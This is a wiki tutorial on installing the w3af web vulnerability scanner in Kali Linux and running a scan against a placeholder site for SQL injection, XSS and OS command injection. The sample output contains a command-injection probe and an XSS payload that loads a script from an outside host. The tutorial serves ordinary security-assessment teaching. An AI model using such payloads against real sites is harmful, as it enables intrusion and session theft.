Kali Linux: w3af (en)

From OnnoWiki
Revision as of 05:57, 4 January 2025 by Onnowpurbo (talk | contribs) (Created page with "W3AF is a feature-rich web attack application and audit framework aimed at detecting and exploiting web vulnerabilities. The entire application security assessment process is...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

W3AF is a feature-rich web attack application and audit framework aimed at detecting and exploiting web vulnerabilities. The entire application security assessment process is automated, and the framework is designed to follow three main steps: discovery, audit, and attack. Each of these steps includes several plugins that can help auditors focus on specific testing criteria. All of these plugins can communicate and share test data to achieve the desired goal. It supports detection and exploitation of several web application vulnerabilities including SQL injection, cross-site scripting, remote and local file inclusion, buffer overflows, XPath injection, OS command, application misconfiguration, and so on. For more information on each available plugin, visit: http://w3af.sourceforge.net/plugin-descriptions.php.

W3AF installation can use the command, 

cd ~
apt install libcrypto++-dev
apt-get update
apt-get install -y python-pip w3af
pip install --upgrade pip
git clone https://github.com/andresriancho/w3af.git
cd w3af
./w3af_console
./tmp/w3af_dependency_install.sh

Once installed, to run W3AF, go to 

Kali Linux > Web Applications > Web Vulnerability Scanners > w3af (Console)

or use the console to run the following command: 

w3af_console

This will put you in the personalized W3AF console mode (w3af >>>). Note that a GUI version of this tool is also available at the same menu location, but we prefer to introduce you to the console version for its flexibility and ease of customization. 

w3af>>> help

This will display all the basic options that can be used to configure the tests. You can use the help command whenever you need assistance to understand specific options. In this exercise, first configure the output plugin, activate selected audit tests, set the target, and run the scanning process against the target site using the following commands: 

w3af>>> plugins
w3af/plugins>>> help
w3af/plugins>>> output
w3af/plugins>>> output console, htmlFile
w3af/plugins>>> output config htmlFile
w3af/plugins/output/config:htmlFile>>> help
w3af/plugins/output/config:htmlFile>>> view
w3af/plugins/output/config:htmlFile>>> set verbose True
w3af/plugins/output/config:htmlFile>>> set fileName testreport.html
w3af/plugins/output/config:htmlFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> help
w3af/plugins/output/config:console>>> view
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back
w3af/plugins>>> audit
w3af/plugins>>> audit htaccessMethods, osCommanding, sqli, xss
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> help
w3af/config:target>>> view
w3af/config:target>>> set target http://testphp.example.com/
w3af/config:target>>> back
w3af>>>


At this point, we have configured all necessary test parameters. Our target will be evaluated against SQL injection, cross-site scripting, OS commanding, and htaccess configuration errors using the following code: 

w3af>>> start
Auto-enabling plugin: grep.error500
Auto-enabling plugin: grep.httpAuthDetect
Found 2 URLs and 2 different points of injection.
The list of URLs is:
- http://testphp.example.com/
- http://testphp.example.com/search.php?test=query
The list of fuzzable requests is:
[227] Vulnerability Mapping
- http://testphp.example.com/ | Method: GET
- http://testphp.example.com/search.php?test=query | Method: POST |
Parameters: (searchFor="")
Starting sqli plugin execution.
Starting osCommanding plugin execution.
A possible OS Commanding was found at:
"http://testphp.example.com/search.php?test=query", using
HTTP method POST. The sent post-data was:
"searchFor=run+ping+-n+3+localhost&goButton=go". Please review manually.
This information was found in the request with id 22.
Starting xss plugin execution.
Cross Site Scripting was found at:
"http://testphp.example.com/search.php?test=query",
using HTTP method POST. The sent post-data was:
"searchFor=<ScRIPt/SrC=http://x4Xp/x.js></ScRIPt>&goButton=go". 

This vulnerability affects Internet Explorer 6, Internet Explorer 7, Netscape with IE 
rendering engine, Mozilla Firefox, Netscape with Gecko rendering engine. This vulnerability 
was found in the request with id 39. Starting htaccessMethods plugin execution. Finished 
scanning process.

As you can see, we have discovered several serious security vulnerabilities in the target web application. According to our configuration, the default location for the testing report (HTML) is /usr/share/web/w3af/testreport.html, detailing all vulnerabilities including debug information about each data request and response transferred between W3AF and the target web application. The test case we presented in the previous code does not reflect the use of other useful plugins, profiles, and exploitation options. Therefore, we highly recommend that you practice through various exercises available in the user guide, which can be found at 

http://w3af.org/howtos/understanding-the-basics
http://docs.w3af.org/en/latest/
Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Kali_Linux:_w3af_(en)&oldid=71375"